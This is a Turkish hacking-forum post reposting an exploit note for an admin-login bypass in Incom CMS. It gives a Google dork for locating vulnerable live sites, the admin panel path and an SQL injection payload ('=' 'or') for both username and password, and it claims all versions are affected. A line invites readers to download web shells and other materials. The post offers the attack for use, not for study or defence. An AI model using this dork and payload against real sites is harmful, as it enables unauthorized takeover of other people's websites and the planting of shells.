Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Incom CMS SQL Injection
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 117
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Incom CMS SQL Injection
31.12.2014 13:59
# Exploit Title: Incom Cms Admin Bypass Vulnerability
# Google Dork: intext:"incom cms" . intext:"site by overron" . intitle:"INCOM CMS"
# Date: 2014-12-29
# Exploit Author: Xodiak
# Vendor Homepage: http://facebook.com/xodiakbalckhat
# Software Link: http://incomcms.com
# Version: All Version
# Tested on: Kali , Windows
# CVE : N/A

Shelleri Ve materyalleri İndirmek İcin Tıkla İndir

Incom Cms Admin Bypass Vulnerability :

PHP Kod:
http://localhost/incomcms/_cm_admin/ 

Sometime You Get 403 Error Forbidden But Many Site Have This Vulnerability

After You Go In Admin Page Enter UserName & Password And Username And Password Is :

UserName : '=' 'or'
Password : '=' 'or'


Alinti



1 Ziyaretçi